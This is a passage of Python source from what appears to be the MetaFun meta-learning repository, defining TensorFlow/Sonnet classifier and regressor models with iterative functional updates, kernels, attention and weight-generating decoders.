list(zip(training_gradients, training_variables)), self.global_step)
def visualise(self, save_name="", num_plots=9):
tr_input, tr_output, tr_func, val_input, val_output, val_func, preds, sigma = \
self.sess.run([self.eval_tr_input, self.eval_tr_output, self.eval_tr_func,
self.eval_val_input, self.eval_val_output, self.eval_val_func, self.eval_val_preds, self.eval_val_sigma])
preds = np.transpose(preds, axes=[1,0,2,3])
sigma = np.transpose(sigma, axes=[1,0,2,3])
for idx in range(num_plots):
utils.plot_iterative_functions(val_input[idx:idx+1], val_output[idx:idx+1], val_func[idx:idx+1],
tr_input[idx:idx+1], tr_output[idx:idx+1], tr_func[idx:idx+1], preds[:, idx:idx+1],
fname=os.path.join(self.result_path, "{0}/iters-{1}-{2}.png".format(self.name, save_name, idx)))
print("( Figures saved to {} )".format(os.path.join(self.result_path, self.name)))
def _construct_loss_and_eval_ops_for_regression(inner_model, inputs, is_training):
call_fn = functools.partial(inner_model.__call__, is_training=is_training)
per_instance_loss, per_instance_tr_metric, per_instance_val_metric, tr_input, tr_output, tr_func, \
val_input, val_output, val_func, val_preds, val_sigma = tf.map_fn(call_fn, inputs, \
dtype=tuple([tf.float32 for i in range(11)]), back_prop=is_training)
loss = tf.reduce_mean(per_instance_loss)
tr_metric = tf.reduce_mean(per_instance_tr_metric)
val_metric = tf.reduce_mean(per_instance_val_metric)
return loss, tr_metric, val_metric, tr_input, tr_output, tr_func, val_input, val_output, val_func, val_preds, val_sigma
```
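Both `_construct_loss_and_eval_ops_*` helpers above use `tf.map_fn` to run the model once per task in a meta-batch and then average the per-task quantities; a stripped-down sketch of that pattern (shapes are made up):
```python
# Hypothetical sketch of the per-task mapping pattern: map a loss over tasks, then average.
import tensorflow as tf

tasks = tf.random.uniform([12, 10, 1])                                  # 12 tasks, 10 points each
per_task_loss = tf.map_fn(lambda t: tf.reduce_mean(t ** 2), tasks, dtype=tf.float32)
meta_loss = tf.reduce_mean(per_task_loss)
```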
#### File: jinxu06/MetaFun-Tensorflow/model.py
```python
from six.moves import zip
import math
from absl import flags
import numpy as np
import tensorflow as tf
import sonnet as snt
from tensorflow.contrib.layers import layer_norm
import data.classification as cls_data
FLAGS = flags.FLAGS
# Model Specification
flags.DEFINE_integer("num_iters", 1, "Number of iterations (T).")
flags.DEFINE_integer("dim_reprs", 64, "Dimension of the functional representation outputs (dim(r(x))).")
flags.DEFINE_integer("nn_size", 64, "Size of hidden layers in neural modules.")
flags.DEFINE_integer("nn_layers", 3, "Number of MLP layers in neural modules.")
flags.DEFINE_integer("embedding_layers", 1, "Num of embedding mlp layers.")
flags.DEFINE_float(
"initial_inner_lr", 1.0, "The initial learning rate for functional updates.")
flags.DEFINE_boolean("use_kernel", False, "If True, use kernel; If False, use attention.")
flags.DEFINE_boolean("use_gradient", False, "If True, use gradient-based local updater; "
"If False, use neural local updater.")
flags.DEFINE_boolean("no_decoder", False, "Whether to remove decoder and directly use the functional "
"representation as the predictor .")
flags.DEFINE_string("initial_state_type", "zero", "Type of initial state (zero/constant/parametric)")
flags.DEFINE_string("attention_type", "dot_product", "Type of attention (only dot_product is supported now)")
flags.DEFINE_string("kernel_type", "se", "Type of kernel functions (se/deep_se)")
flags.DEFINE_boolean("repr_as_inputs", False, "If true, use reprs as inputs to the decoder; "
"If false, use reprs to generate weights of the predictor.")
# Regularisation
flags.DEFINE_float("dropout_rate", 0.0, "Rate of dropout.")
flags.DEFINE_float("l2_penalty_weight", 1e-8, "The weight measuring the "
"importance of the l2 regularization in the final loss. See λ₁ "
"in LEO paper.")
flags.DEFINE_float("orthogonality_penalty_weight", 1e-3, "The weight measuring "
"the importance of the decoder orthogonality regularization "
"in the final loss. See λ₂ in LEO paper.")
flags.DEFINE_float("label_smoothing", 0.0, "Label smoothing for classification tasks.")
class MetaFunClassifier(snt.AbstractModule):
def __init__(self, name="MetaFunClassifier"):
super(MetaFunClassifier, self).__init__(name=name)
self._float_dtype = tf.float32
self._int_dtype = tf.int32
# Components configurations
self._use_kernel = FLAGS.use_kernel
self._use_gradient = FLAGS.use_gradient
self._attention_type = FLAGS.attention_type
self._kernel_type = FLAGS.kernel_type
self._no_decoder = FLAGS.no_decoder
if self._no_decoder:
self._dim_reprs = 1
self._initial_state_type = FLAGS.initial_state_type
# Architecture configurations
self._nn_size = FLAGS.nn_size
self._nn_layers = FLAGS.nn_layers
        self._dim_reprs = 1 if self._no_decoder else FLAGS.dim_reprs
self._num_iters = FLAGS.num_iters
self._embedding_layers = FLAGS.embedding_layers
# Regularisation configurations
self._l2_penalty_weight = FLAGS.l2_penalty_weight
self._dropout_rate = FLAGS.dropout_rate
self._label_smoothing = FLAGS.label_smoothing
self._orthogonality_penalty_weight = FLAGS.orthogonality_penalty_weight
# Data configurations
self._num_classes = FLAGS.num_classes
self._num_tr_examples_per_class = FLAGS.num_tr_examples_per_class
self._num_val_examples_per_class = FLAGS.num_val_examples_per_class
# Other configurations
self._initial_inner_lr = FLAGS.initial_inner_lr
self._nonlinearity = tf.nn.relu
def _build(self, data, is_training=True):
data = cls_data.ClassificationDescription(*data)
self.is_training = is_training
self.embedding_dim = data.tr_input.get_shape()[-1].value
# initial states
tr_reprs = self.forward_initialiser(data.tr_input)
val_reprs = self.forward_initialiser(data.val_input)
# inner learning rate
alpha = tf.compat.v1.get_variable("alpha", [1, 1], dtype=self._float_dtype,
initializer=tf.constant_initializer(self._initial_inner_lr), trainable=True)
# iterative functional updating
for k in range(self._num_iters):
updates = self.forward_local_updater(tr_reprs, data.tr_output, data.tr_input)
tr_updates = alpha * self.forward_kernel_or_attention(querys=data.tr_input, keys=data.tr_input, values=updates)
val_updates = alpha * self.forward_kernel_or_attention(querys=data.val_input, keys=data.tr_input, values=updates)
tr_reprs += tr_updates
val_reprs += val_updates
# decode functional representation
classifier_weights = self.forward_decoder(tr_reprs)
tr_loss, tr_metric = self.calculate_loss_and_acc(
data.tr_input, data.tr_output, classifier_weights)
classifier_weights = self.forward_decoder(val_reprs)
val_loss, val_metric = self.calculate_loss_and_acc(
data.val_input, data.val_output, classifier_weights)
# aggregate loss and metrics in a batch
        batch_tr_loss = tf.reduce_mean(tr_loss)
batch_tr_metric = tf.reduce_mean(tr_metric)
batch_val_loss = tf.reduce_mean(val_loss)
batch_val_metric = tf.reduce_mean(val_metric)
#
regularization_penalty = (
self._l2_regularization + self._decoder_orthogonality_reg)
return batch_val_loss + regularization_penalty, batch_tr_metric, batch_val_metric
### Initialiser r_0(x) ###
@snt.reuse_variables
def forward_initialiser(self, x):
num_points = tf.shape(x)[0]
if self._initial_state_type == "parametric":
reprs = self.parametric_initialiser(x)
elif self._initial_state_type == "constant":
reprs = self.constant_initialiser(num_points, trainable=True)
elif self._initial_state_type == 'zero':
reprs = self.constant_initialiser(num_points, trainable=False)
else:
raise NameError("Unknown initial state type")
tf.compat.v1.logging.info("forwarded {0} initialiser".format(self._initial_state_type))
return reprs
# r_0(x) = c
@snt.reuse_variables
def constant_initialiser(self, num_points, trainable=False):
with tf.compat.v1.variable_scope("constant_initialiser"):
if trainable:
init = tf.compat.v1.get_variable(
"initial_state", [1, self._dim_reprs],
dtype=self._float_dtype,
initializer=tf.constant_initializer(0.0), trainable=True)
else:
init = tf.zeros([1, self._dim_reprs])
init = tf.tile(init, [num_points, 1])
init = tf.concat([init for c in range(self._num_classes)], axis=-1)
return init
# r_0(x) = MLP(x)
@snt.reuse_variables
def parametric_initialiser(self, x):
with tf.compat.v1.variable_scope("parametric_initialiser"):
after_dropout = tf.nn.dropout(x, rate=self.dropout_rate)
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
module = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [self._dim_reprs],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module, n_dims=1)(after_dropout)
outputs = tf.concat([outputs for c in range(self._num_classes)], axis=-1)
return outputs
### Local Updater u ###
@snt.reuse_variables
def forward_local_updater(self, r, y, x=None, iter=""):
if self._use_gradient:
updates = self.gradient_local_updater(r=r, y=y, x=x, iter=iter)
tf.compat.v1.logging.info("forwarded gradient local updater")
else:
r_shape = r.shape.as_list()
r = tf.reshape(r, r_shape[:-1] +[self._num_classes, r_shape[-1]//self._num_classes])
updates = self.neural_local_updater(r=r, y=y, x=x, iter=iter)
updates = tf.reshape(updates, shape=r_shape)
tf.compat.v1.logging.info("forwarded neural local updater")
return updates
#
@snt.reuse_variables
def neural_local_updater(self, r, y, x=None, iter=""):
with tf.compat.v1.variable_scope("neural_local_updater{}".format(iter), reuse=tf.compat.v1.AUTO_REUSE):
y = tf.one_hot(y, self._num_classes)
y = tf.transpose(y, perm=[0, 2, 1])
# reprs = tf.nn.dropout(reprs, rate=self.dropout_rate)
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
# MLP m
module1 = snt.nets.MLP(
[self._nn_size] * self._nn_layers,
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module1, n_dims=2)(r)
agg_outputs = tf.reduce_mean(outputs, axis=-2, keepdims=True)
outputs = tf.concat([outputs, tf.tile(agg_outputs, [1,self._num_classes,1])], axis=-1)
# MLP u+
module2 = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [self._dim_reprs],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
name="true",
)
outputs_t = snt.BatchApply(module2, n_dims=2)(outputs)
# MLP u-
module3 = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [self._dim_reprs],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
name="false",
)
outputs_f = snt.BatchApply(module3, n_dims=2)(outputs)
outputs = outputs_t * y + outputs_f * (1-y)
return outputs
# gradient-based local updater, used in ablation study
@snt.reuse_variables
def gradient_local_updater(self, r, y, x=None, iter=""):
with tf.compat.v1.variable_scope("gradient_local_updater{}".format(iter), reuse=tf.compat.v1.AUTO_REUSE):
lr = tf.compat.v1.get_variable(
"lr", [1, self._num_classes * self._dim_reprs],
dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
classifier_weights = self.forward_decoder(r)
tr_loss, _= self.calculate_loss_and_acc(
x, y, classifier_weights)
batch_tr_loss = tf.reduce_mean(tr_loss)
loss_grad = tf.gradients(batch_tr_loss, r)[0]
updates = - lr * loss_grad
return updates
### Kernel and Attention ###
@snt.reuse_variables
def forward_kernel_or_attention(self, querys, keys, values, iter=""):
if self._use_kernel:
if self._kernel_type == "se":
rtn_values = self.squared_exponential_kernel(querys, keys, values, iter=iter)
elif self._kernel_type == 'deep_se':
rtn_values = self.deep_se_kernel(querys, keys, values, iter=iter)
else:
raise NameError("Unknown kernel type")
tf.compat.v1.logging.info("forwarded {0} kernel".format(self._kernel_type))
else:
rtn_values = self.attention_block(querys, keys, values, iter=iter)
tf.compat.v1.logging.info("forwarded {0} attention".format(self._attention_type))
return rtn_values
@snt.reuse_variables
def squared_exponential_kernel(self, querys, keys, values, iter=""):
num_keys = tf.shape(keys)[0]
num_querys = tf.shape(querys)[0]
with tf.compat.v1.variable_scope("squared_exponential_kernel{}".format(iter), reuse=tf.compat.v1.AUTO_REUSE):
sigma = tf.compat.v1.get_variable("sigma", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
lengthscale = tf.compat.v1.get_variable("lengthscale", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
_keys = tf.tile(tf.expand_dims(keys, axis=1), [1, num_querys, 1])
_querys = tf.tile(tf.expand_dims(querys, axis=0), [num_keys, 1, 1])
sq_norm = tf.reduce_sum((_keys - _querys)**2, axis=-1)
kernel_qk = sigma**2 * tf.exp(- sq_norm / (2.*lengthscale**2))
k = kernel_qk
v = tf.einsum('kq,kv->qv', k, values)
return v
@snt.reuse_variables
def deep_se_kernel(self, querys, keys, values, iter=""):
with tf.compat.v1.variable_scope("deep_se_kernel{}".format(iter), reuse=tf.compat.v1.AUTO_REUSE):
# deep embedding of keys and querys
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
module = snt.nets.MLP(
[self.embedding_dim] * self._embedding_layers,
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
keys = snt.BatchApply(module, n_dims=1)(keys)
querys = snt.BatchApply(module, n_dims=1)(querys)
num_keys = tf.shape(keys)[0]
num_querys = tf.shape(querys)[0]
with tf.compat.v1.variable_scope("deep_se_kernel"):
sigma = tf.compat.v1.get_variable("sigma", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
lengthscale = tf.compat.v1.get_variable("lengthscale", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
# compute \sum_i k(x, x_i)u_i
_keys = tf.tile(tf.expand_dims(keys, axis=1), [1, num_querys, 1])
_querys = tf.tile(tf.expand_dims(querys, axis=0), [num_keys, 1, 1])
sq_norm = tf.reduce_sum((_keys - _querys)**2, axis=-1)
kernel_qk = sigma**2 * tf.exp(- sq_norm / (2.*lengthscale**2))
k = kernel_qk
v = tf.einsum('kq,kv->qv', k, values)
return v
@snt.reuse_variables
def attention_block(self, querys, keys, values, iter=""):
config = {
"rep": "mlp",
"output_sizes": [self.embedding_dim] * self._embedding_layers,
"att_type": self._attention_type,
"normalise": True,
"scale": 1.0,
"l2_penalty_weight": self._l2_penalty_weight,
"nonlinearity": self._nonlinearity,
}
with tf.compat.v1.variable_scope("attention_block{}".format(iter), reuse=tf.compat.v1.AUTO_REUSE):
attention = Attention(config=config)
v = attention(keys, querys, values)
return v
### Decoder ###
@snt.reuse_variables
def forward_decoder(self, cls_reprs):
if self._no_decoder:
# use functional representation directly as the predictor, used in ablation study
tf.compat.v1.logging.info("no decoder used")
return cls_reprs
s = cls_reprs.shape.as_list()
cls_reprs = tf.reshape(cls_reprs, s[:-1]+[self._num_classes, self._dim_reprs])
weights_dist_params = self.decoder(cls_reprs)
fan_in = self.embedding_dim
fan_out = self._num_classes
stddev_offset = np.sqrt(2. / (fan_out + fan_in))
classifier_weights = self.sample(weights_dist_params,
stddev_offset=stddev_offset)
return classifier_weights
# this decoder generates weights of softmax
@snt.reuse_variables
def decoder(self, inputs):
with tf.compat.v1.variable_scope("decoder"):
l2_regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
orthogonality_reg = get_orthogonality_regularizer(
self._orthogonality_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
# 2 * embedding_dim, because we are returning means and variances
decoder_module = snt.Linear(
self.embedding_dim * 2,
use_bias=True,
regularizers={"w": l2_regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(decoder_module, n_dims=2)(inputs)
self._orthogonality_reg = orthogonality_reg(decoder_module.w)
return outputs
### Other ###
@property
def dropout_rate(self):
return self._dropout_rate if self.is_training else 0.0
@property
def _l2_regularization(self):
return tf.cast(tf.reduce_sum(tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.REGULARIZATION_LOSSES)),
dtype=self._float_dtype)
def loss_fn(self, model_outputs, original_classes):
original_classes = tf.squeeze(original_classes, axis=-1)
one_hot_outputs = tf.one_hot(original_classes, depth=self._num_classes)
return tf.compat.v1.losses.softmax_cross_entropy(onehot_labels=one_hot_outputs, logits=model_outputs, \
label_smoothing=self._label_smoothing, reduction=tf.compat.v1.losses.Reduction.NONE)
def predict(self, inputs, weights):
if self._no_decoder:
return weights
after_dropout = tf.nn.dropout(inputs, rate=self.dropout_rate)
preds = tf.einsum("ik,imk->im", after_dropout, weights)
return preds
def calculate_loss_and_acc(self, inputs, true_outputs, classifier_weights):
model_outputs = self.predict(inputs, classifier_weights)
model_predictions = tf.argmax(
model_outputs, -1, output_type=self._int_dtype)
accuracy = tf.contrib.metrics.accuracy(model_predictions,
tf.squeeze(true_outputs, axis=-1))
return self.loss_fn(model_outputs, true_outputs), accuracy
def sample(self, distribution_params, stddev_offset=0.):
means, unnormalized_stddev = tf.split(distribution_params, 2, axis=-1)
stddev = tf.exp(unnormalized_stddev)
stddev -= (1. - stddev_offset)
stddev = tf.maximum(stddev, 1e-10)
distribution = tf.distributions.Normal(loc=means, scale=stddev)
if not self.is_training:
return means
samples = distribution.sample()
return samples
@property
def _decoder_orthogonality_reg(self):
return self._orthogonality_reg
class MetaFunRegressor(snt.AbstractModule):
def __init__(self, name="MetaFunRegressor"):
super(MetaFunRegressor, self).__init__(name=name)
self._float_dtype = tf.float32
self._int_dtype = tf.int32
# components configurations
self._use_kernel = FLAGS.use_kernel
self._use_gradient = FLAGS.use_gradient
self._attention_type = FLAGS.attention_type
self._kernel_type = FLAGS.kernel_type
self._no_decoder = FLAGS.no_decoder
if self._no_decoder:
self._dim_reprs = 1
self._initial_state_type = FLAGS.initial_state_type
# neural module configurations
self._nn_size = FLAGS.nn_size
self._nn_layers = FLAGS.nn_layers
        self._dim_reprs = 1 if self._no_decoder else FLAGS.dim_reprs
self._num_iters = FLAGS.num_iters
self._embedding_layers = FLAGS.embedding_layers
# regularisation configurations
self._l2_penalty_weight = FLAGS.l2_penalty_weight
self._dropout_rate = FLAGS.dropout_rate
self._orthogonality_penalty_weight = FLAGS.orthogonality_penalty_weight
#
self._initial_inner_lr = FLAGS.initial_inner_lr
self._orthogonality_reg = 0
self._loss_type = "mse" # mse | log_prob
self._nonlinearity = tf.nn.relu
self._repr_as_inputs = FLAGS.repr_as_inputs
def _build(self, data, is_training=True):
self.is_training = is_training
self.embedding_dim = data.tr_input.get_shape()[-1].value
tr_input = data.tr_input
val_input = data.val_input
tr_output = data.tr_output
val_output = data.val_output
# initial states
tr_reprs = self.forward_initialiser(tr_input)
val_reprs = self.forward_initialiser(val_input)
all_tr_reprs = [tr_reprs]
all_val_reprs = [val_reprs]
# inner learning rate
alpha = tf.compat.v1.get_variable("alpha", [1, 1], dtype=self._float_dtype,
initializer=tf.constant_initializer(self._initial_inner_lr), trainable=True)
# iterative functional updating
for k in range(self._num_iters):
updates = self.forward_local_updater(r=tr_reprs, y=tr_output, x=tr_input)
tr_updates = alpha * self.forward_kernel_or_attention(querys=tr_input, keys=tr_input, values=updates)
val_updates = alpha * self.forward_kernel_or_attention(querys=val_input, keys=tr_input, values=updates)
tr_reprs += tr_updates
val_reprs += val_updates
all_tr_reprs.append(tr_reprs)
all_val_reprs.append(val_reprs)
# record predictions at each iteration for visualisation
all_val_mu = []
all_val_sigma = []
output_sizes = [self._nn_size] * (self._nn_layers-1) + [2] # architecture of the predictor
        # decode r_t(x) at each iteration into the predictor for visualisation
for k in range(self._num_iters+1):
weights = self.forward_decoder(all_tr_reprs[k], output_sizes=output_sizes) # generate weights of the predictor
tr_mu, tr_sigma = self.predict(tr_input, weights, output_sizes=output_sizes) # forward the predictor
weights = self.forward_decoder(all_val_reprs[k], output_sizes=output_sizes)
val_mu, val_sigma = self.predict(val_input, weights, output_sizes=output_sizes)
all_val_mu.append(val_mu)
all_val_sigma.append(val_sigma)
#
tr_loss, tr_metric = self.calculate_loss_and_metrics(
tr_output, tr_mu, tr_sigma)
val_loss, val_metric = self.calculate_loss_and_metrics(
val_output, val_mu, val_sigma)
batch_tr_loss = tf.reduce_mean(tr_loss)
batch_tr_metric = tf.reduce_mean(tr_metric)
batch_val_loss = tf.reduce_mean(val_loss)
batch_val_metric = tf.reduce_mean(val_metric)
#
all_val_mu = tf.stack(all_val_mu, axis=0)
all_val_sigma = tf.stack(all_val_sigma, axis=0)
#
regularization_penalty = (
self._l2_regularization + self._decoder_orthogonality_reg)
return batch_tr_loss + batch_val_loss + regularization_penalty, batch_tr_metric, batch_val_metric, \
data.tr_input, data.tr_output, data.tr_func, data.val_input, data.val_output, \
data.val_func, all_val_mu, all_val_sigma
### Initialiser r_0(x) ###
@snt.reuse_variables
def forward_initialiser(self, x):
num_points = tf.shape(x)[0]
if self._initial_state_type == 'zero':
reprs = self.constant_initialiser(num_points, trainable=False)
elif self._initial_state_type == "constant":
reprs = self.constant_initialiser(num_points, trainable=True)
elif self._initial_state_type == "parametric":
reprs = self.parametric_initialiser(x)
else:
raise NameError("Unknown initial state type")
tf.compat.v1.logging.info("forwarded {0} initialiser".format(self._initial_state_type))
return reprs
# r_0(x) = c
@snt.reuse_variables
def constant_initialiser(self, num_points, trainable=False):
with tf.compat.v1.variable_scope("constant_initialiser"):
if trainable:
init = tf.compat.v1.get_variable(
"initial_state", [1, self._dim_reprs],
dtype=self._float_dtype,
initializer=tf.constant_initializer(0.0), trainable=True)
else:
init = tf.zeros([1, self._dim_reprs])
init = tf.tile(init, [num_points, 1])
return init
# r_0(x) = MLP(x)
@snt.reuse_variables
def parametric_initialiser(self, x):
with tf.compat.v1.variable_scope("parametric_initialiser"):
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
module = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [self._dim_reprs],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module, n_dims=1)(x)
return outputs
### Local Updater u ###
@snt.reuse_variables
def forward_local_updater(self, r, y, x):
if self._use_gradient:
updates = self.gradient_local_updater(r=r, y=y, x=x)
tf.compat.v1.logging.info("forwarded gradient local updater")
else:
updates = self.neural_local_updater(r=r, y=y, x=x)
tf.compat.v1.logging.info("forwarded neural local updater")
return updates
# neural local updater, for regression, we simply concatenate [r, y, x]
@snt.reuse_variables
def neural_local_updater(self, r, y, x=None):
with tf.compat.v1.variable_scope("neural_local_updater"):
if x is not None:
reprs = tf.concat([r, y, x], axis=-1)
else:
reprs = tf.concat([r, y], axis=-1)
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
module = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [self._dim_reprs],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module, n_dims=1)(reprs)
return outputs
# gradient-based local updater, used in ablation study
@snt.reuse_variables
def gradient_local_updater(self, r, y, x=None):
with tf.compat.v1.variable_scope("gradient_local_updater"):
lr = tf.compat.v1.get_variable(
"lr", [1, self._dim_reprs],
dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
r = tf.stop_gradient(r)
weights = self.forward_decoder(r)
tr_mu, tr_sigma = self.predict(x, weights)
tr_loss, tr_mse = self.calculate_loss_and_metrics(
                y, tr_mu, tr_sigma)
# self.debug_op = tf.gradients(weights, reprs)[0]
batch_tr_loss = tf.reduce_mean(tr_loss)
loss_grad = tf.gradients(batch_tr_loss, r)[0]
updates = - lr * loss_grad
return updates
### Kernel and Attention ###
@snt.reuse_variables
def forward_kernel_or_attention(self, querys, keys, values):
if self._use_kernel:
if self._kernel_type == "se":
rtn_values = self.squared_exponential_kernel(querys, keys, values)
elif self._kernel_type == 'deep_se':
rtn_values = self.deep_se_kernel(querys, keys, values)
else:
raise NameError("Unknown kernel type")
tf.compat.v1.logging.info("forwarded {0} kernel".format(self._kernel_type))
else:
rtn_values = self.attention_block(querys, keys, values)
tf.compat.v1.logging.info("forwarded {0} attention".format(self._attention_type))
return rtn_values
@snt.reuse_variables
def squared_exponential_kernel(self, querys, keys, values):
num_keys = tf.shape(keys)[0]
num_querys = tf.shape(querys)[0]
with tf.compat.v1.variable_scope("squared_exponential_kernel"):
sigma = tf.compat.v1.get_variable("sigma", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
lengthscale = tf.compat.v1.get_variable("lengthscale", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
_keys = tf.tile(tf.expand_dims(keys, axis=1), [1, num_querys, 1])
_querys = tf.tile(tf.expand_dims(querys, axis=0), [num_keys, 1, 1])
sq_norm = tf.reduce_sum((_keys - _querys)**2, axis=-1)
kernel_qk = sigma**2 * tf.exp(- sq_norm / (2.*lengthscale**2))
k = kernel_qk
v = tf.einsum('kq,kv->qv', k, values)
return v
@snt.reuse_variables
def deep_se_kernel(self, querys, keys, values):
with tf.compat.v1.variable_scope("deep_se_kernel"):
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
module = snt.nets.MLP(
[self._nn_size] * self._embedding_layers,
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
keys = snt.BatchApply(module, n_dims=1)(keys)
querys = snt.BatchApply(module, n_dims=1)(querys)
num_keys = tf.shape(keys)[0]
num_querys = tf.shape(querys)[0]
with tf.compat.v1.variable_scope("deep_se_kernel"):
sigma = tf.compat.v1.get_variable("sigma", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
lengthscale = tf.compat.v1.get_variable("lengthscale", shape=(), dtype=self._float_dtype,
initializer=tf.constant_initializer(1.0), trainable=True)
# compute \sum_i k(x, x_i)u_i
_keys = tf.tile(tf.expand_dims(keys, axis=1), [1, num_querys, 1])
_querys = tf.tile(tf.expand_dims(querys, axis=0), [num_keys, 1, 1])
sq_norm = tf.reduce_sum((_keys - _querys)**2, axis=-1)
kernel_qk = sigma**2 * tf.exp(- sq_norm / (2.*lengthscale**2))
k = kernel_qk
v = tf.einsum('kq,kv->qv', k, values)
return v
@snt.reuse_variables
def attention_block(self, querys, keys, values):
config = {
"rep": "mlp",
"output_sizes": [self._nn_size] * self._embedding_layers,
"att_type": self._attention_type,
"normalise": True,
"scale": 1.0,
"l2_penalty_weight": self._l2_penalty_weight,
"nonlinearity": self._nonlinearity,
}
with tf.compat.v1.variable_scope("attention_block"):
attention = Attention(config=config)
v = attention(keys, querys, values)
return v
@snt.reuse_variables
def forward_decoder(self, reprs, output_sizes=[40,40,2]):
if self._no_decoder:
tf.compat.v1.logging.info("no decoder used")
return reprs
else:
weights_dist_params = self.decoder(reprs, output_sizes=output_sizes)
stddev_offset = np.sqrt(1. / self._nn_size)
weights = self.sample(weights_dist_params, stddev_offset=stddev_offset)
tf.compat.v1.logging.info("forwarded decoder")
return weights
@snt.reuse_variables
def decoder(self, reprs, output_sizes=[40,40,2]):
with tf.compat.v1.variable_scope("decoder"):
# _repr_as_inputs = True: Representation is used as inputs to the predictor
# _repr_as_inputs = False: Representation is used to generate weights of the predictor
if self._repr_as_inputs:
return reprs
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
num_layers = len(output_sizes)
output_sizes = [self.embedding_dim] + output_sizes
# count number of parameters in the predictor
num_params = 0
for i in range(num_layers):
num_params += (output_sizes[i]+1) * output_sizes[i+1]
# decode the representation into the weights of the predictor
module = snt.nets.MLP(
[self._nn_size] * self._nn_layers + [2 * num_params],
activation=self._nonlinearity,
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module, n_dims=1)(reprs)
return outputs
@snt.reuse_variables
def predict(self, inputs, weights, output_sizes=[40,40,2]):
# no_decoder = True: functional representation is the predictor itself (unused for regression problems)
if self._no_decoder:
if self._dim_reprs == 1: # predictive mean
return weights, tf.ones_like(weights) * 0.5
elif self._dim_reprs == 2: # predictive mean and std
return tf.split(weights, 2, axis=-1)
else:
raise Exception("num_reprs must <=2 if no_decoder")
if self._repr_as_inputs:
with tf.compat.v1.variable_scope("predict"):
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
outputs = tf.concat([weights, inputs], axis=-1) # weights is actually repr for repr_as_inputs=True
# construct the predictor conditioned on the repr (weights).
                # repr is fed into the network at each layer.
for i, s in enumerate(output_sizes):
module = snt.nets.MLP(
[s],
use_bias=True,
regularizers={"w": regularizer},
initializers={"w": initializer},
)
outputs = snt.BatchApply(module, n_dims=1)(outputs)
if i < len(output_sizes)-1:
outputs = self._nonlinearity(outputs)
outputs = tf.concat([outputs, weights], axis=-1)
preds = outputs
else:
# use the generated weights to construct the predictor
num_layers = len(output_sizes)
output_sizes = [self.embedding_dim] + output_sizes
begin = 0
preds = inputs
for i in range(num_layers):
in_size = output_sizes[i]
out_size = output_sizes[i+1]
end = begin + in_size * out_size
w = tf.reshape(weights[:, begin:end], [-1, in_size, out_size])
b = tf.reshape(weights[:, end:end+out_size], [-1, out_size])
begin = end + out_size
preds = tf.einsum("ik,ikm->im", preds, w) + b
if i < num_layers - 1:
preds = self._nonlinearity(preds)
# return preds
mu, log_sigma = tf.split(preds, 2, axis=-1)
sigma = 0.1 + 0.9 * tf.nn.softplus(log_sigma)
return mu, sigma
def sample(self, distribution_params, stddev_offset=0.):
        # here we consider a deterministic case, but one can try the probabilistic version
means, unnormalized_stddev = tf.split(distribution_params, 2, axis=-1)
return means
        ## probabilistic version:
# stddev = tf.exp(unnormalized_stddev)
# stddev -= (1. - stddev_offset)
# stddev = tf.maximum(stddev, 1e-10)
# distribution = tf.distributions.Normal(loc=means, scale=stddev)
# if not self.is_training:
# return means
# samples = distribution.sample()
# return samples
def loss_fn(self, model_outputs, labels):
return tf.losses.mean_squared_error(labels=labels, predictions=model_outputs,
reduction=tf.compat.v1.losses.Reduction.NONE)
def calculate_loss_and_metrics(self, target_y, mus, sigmas, coeffs=None):
